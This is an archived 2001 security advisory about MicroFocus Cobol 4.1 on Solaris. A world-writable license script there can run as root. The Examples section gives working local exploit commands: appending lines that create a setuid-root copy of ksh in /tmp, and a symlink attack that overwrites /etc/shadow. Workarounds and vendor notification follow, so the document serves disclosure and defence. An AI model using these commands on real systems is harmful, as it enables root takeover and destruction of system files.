Security Hole in Microfocus Cobol

2001-02-13T00:00:00
ID SECURITYVULNS:DOC:1283
Type securityvulns
Reporter Securityvulns
Modified 2001-02-13T00:00:00

Description

Summary

If the AppTrack feature is enabled, the default install of MicroFocus Cobol 4.1 (Merant's commercial suite of cobol utilities) contains a security hole which can lead to root compromise.

Specifics

In the default install, /var/mfaslmf is installed mode 777, and /var/mfaslmf/nolicense is installed mode 666. nolicense also contains the following:

Append into a logfile

if test ! -f /var/mfaslmf/USERLOG then touch /var/mfaslmf/USERLOG chmod 666 /var/mfaslmf/USERLOG fi echo date:No license $* >> /var/mfaslmf/USERLOG

mail a specified user (commented out by default. substitute the user

name) echo date:No license $* > /var/mfaslmf/tmpmess

mail -s "No AS license" user-name < /var/mfaslmf/tmpmess

rm /var/mfaslmf/tmpmess

This presents two major types of problem:

  • Because of the permissions on nolicense, unprivileged users can edit the file to insert arbitrary commands into the script. Then, if AppTrack is enabled (see below) and the trigger condition occurs (again, see below), that code can be executed with superuser privileges.

  • The use of predictably-named temporary files in a world-writeable directory can allow local users to append, overwrite or destroy arbitrary files, even if nolicense itself is made non-world-writeable.

Examples

Of the first problem:

$ id uid=500(echo8) gid=10(users) $ cat >> /var/mfaslmf/nolicense /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh ^D

create a condition under which all available AS licenses are used up.

This should not be difficult. When this occurs, /var/mfaslmf/nolicense

will run.

$ ls -alt /tmp/ksh -rwsr-xr-x 1 root other 186356 Dec 26 17:04 /tmp/ksh $ /tmp/ksh

id

uid=500(echo8) gid=10(users) euid=0(root)

Of the second:

$ id uid=500(echo8) gid=10(users) $ cd /var/mfaslmf $ ln -s /etc/shadow tmpmess

Again, create a condition under which nolicense will run. This

example will overwrite /etc/shadow.

$ cat /etc/shadow (would need to done as root, but you get the point...) Tue Dec 26 17:08:45 EST 2000:No license $

Conditions

These holes can only be exploited if the AppTrack functionality is enabled. This feature is off by default.

Vulnerable Versions

4.1 for Solaris/sparc - only version tested.

Workarounds

Change the permissions on /var/mfaslmf and rewrite nolicense. According to the documentation, nolicense is provided as "an example" and the user "can edit the nolicense script to your requirements." IMO, example code with serious security holes should NOT be distributed. If you don't need this feature, delete the script. Regardless of whether or not you need AppTrack to work, you should be able to change the permissions on /var/mfaslmf to something safer.

Vendor Notification

The vendor was notified on 12/26/2000.

Send comments to echo8@gh0st.net